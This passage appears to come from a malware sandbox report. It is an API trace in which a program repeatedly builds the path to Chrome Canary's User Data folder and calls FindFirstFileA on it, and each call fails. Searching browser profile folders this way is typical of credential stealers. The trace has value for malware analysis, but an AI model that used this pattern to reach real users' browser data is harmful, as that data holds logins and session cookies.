lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.519] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.519] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.520] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.520] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.521] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.521] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.523] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.523] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.523] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.523] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.523] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.523] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.523] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.523] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.523] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.523] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.524] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.524] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.524] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.524] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.524] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.524] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.524] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.524] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.524] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.524] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.525] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.525] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.525] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.525] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", 